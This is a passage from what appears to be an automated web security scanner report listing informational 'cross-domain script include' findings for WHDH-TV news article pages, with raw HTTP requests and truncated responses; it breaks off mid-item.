Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:39:52 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 22522
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - MBTA uses cameras to crack down on fake injury claims</title>
<meta name="
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1526. http://www1.whdh.com/news/articles/local/12003343704088/late-firefighter-s-helmet-returned-to-family/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003343704088/late-firefighter-s-helmet-returned-to-family/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003343704088/late-firefighter-s-helmet-returned-to-family/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:24:21 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 27098
Cache-Control: max-age=42158
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:06:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107002 (MII-APC/1.6)
Content-Length: 23405
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Late firefighter's helmet returned to family</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1527. http://www1.whdh.com/news/articles/local/12003352172056/body-found-on-dorchester-street/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003352172056/body-found-on-dorchester-street/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003352172056/body-found-on-dorchester-street/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:59 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=9507
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:33:38 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21286
Via: 1.1 dfw107003 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Body found on Dorchester street</title>
<meta name="publisher" content="Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1528. http://www1.whdh.com/news/articles/local/12003353543556/heating-safety-pet-care-urged-during-cold/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003353543556/heating-safety-pet-care-urged-during-cold/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003353543556/heating-safety-pet-care-urged-during-cold/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:57 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=8324
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:13:53 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23121
Via: 1.1 dfw107005 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Heating safety, pet care stressed during cold</title>
<meta name="publishe
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1529. http://www1.whdh.com/news/articles/local/12003357106622/bipartisan-mass-lawmakers-offer-own-parole-ideas/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003357106622/bipartisan-mass-lawmakers-offer-own-parole-ideas/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003357106622/bipartisan-mass-lawmakers-offer-own-parole-ideas/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:00 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=15409
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:12:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19859
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Bipartisan Mass. lawmakers offer own Parole ideas</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1530. http://www1.whdh.com/news/articles/local/12003357131364/efforts-under-way-to-remember-leominster-soldier/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003357131364/efforts-under-way-to-remember-leominster-soldier/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003357131364/efforts-under-way-to-remember-leominster-soldier/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:00 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=14717
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:00:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19097
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Efforts under way to remember Leominster soldier</title>
<meta name="publi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1531. http://www1.whdh.com/news/articles/local/12003357194410/clinical-data-gets-fda-ok-for-depression-drug/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003357194410/clinical-data-gets-fda-ok-for-depression-drug/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003357194410/clinical-data-gets-fda-ok-for-depression-drug/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:50 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=30639
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:25:39 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18969
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Clinical Data gets FDA OK for depression drug</title>
<meta name="publishe
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1532. http://www1.whdh.com/news/articles/local/12003358616998/children-parents-bundled-to-go-to-work-and-school/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003358616998/children-parents-bundled-to-go-to-work-and-school/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003358616998/children-parents-bundled-to-go-to-work-and-school/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1
Cache-Control: max-age=29463
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:06:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21849
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Children, parents bundled to go to work and school</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1533. http://www1.whdh.com/news/articles/local/12003358692844/t-riders-endure-long-waits-in-the-cold-trains-delayed/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003358692844/t-riders-endure-long-waits-in-the-cold-trains-delayed/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003358692844/t-riders-endure-long-waits-in-the-cold-trains-delayed/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:32:38 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 1385
Cache-Control: max-age=29347
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 05:40:56 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107022 (MII-APC/1.6)
Content-Length: 21967
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - 'T' riders endure long waits in the cold, trains delayed</title>
<meta nam
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1534. http://www1.whdh.com/news/articles/local/12003358823664/people-do-whatever-they-can-to-stay-warm/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003358823664/people-do-whatever-they-can-to-stay-warm/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003358823664/people-do-whatever-they-can-to-stay-warm/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:31 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 28
Cache-Control: max-age=29280
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:02:41 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 21905
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - People do whatever they can to stay warm</title>
<meta name="publisher" co
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1535. http://www1.whdh.com/news/articles/local/12003358918527/bicyclist-hit-killed-in-boston/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003358918527/bicyclist-hit-killed-in-boston/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003358918527/bicyclist-hit-killed-in-boston/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:39:11 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 998
Cache-Control: max-age=32047
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 06:32:28 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 20689
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Bicyclist hit, killed in Boston</title>
<meta name="publisher" content="Ne
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1536. http://www1.whdh.com/news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003358982377/quincy-school-evacuated-due-to-odor/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:48 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=33445
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 07:12:24 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21272
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Quincy school evacuated due to odor and pipe burst</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1537. http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/ HTTP/1.1
Host: www1.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; __utmc=208585492; __utmb=208585492.1.10.1295906131; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; ACC1TAB=1

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 19:34:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 8441
Cache-Control: max-age=42677
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 07:25:03 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 20082

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Commuter rail service updates for Jan. 24</title>
<meta name="publisher" c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1538. http://www1.whdh.com/news/articles/national/12003335585262/doc-giffords-heard-cheers-leaving-ariz-smiled/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003335585262/doc-giffords-heard-cheers-leaving-ariz-smiled/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003335585262/doc-giffords-heard-cheers-leaving-ariz-smiled/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:32 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43138
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:53:40 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25492
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Doc: Giffords heard cheers leaving Ariz., smiled</title>
<meta name="publi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1539. http://www1.whdh.com/news/articles/national/12003352445114/brain-fluid-buildup-delays-full-rehab-for-giffords/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003352445114/brain-fluid-buildup-delays-full-rehab-for-giffords/

Issue detail

The response dynamically includes the following scripts from other domains:
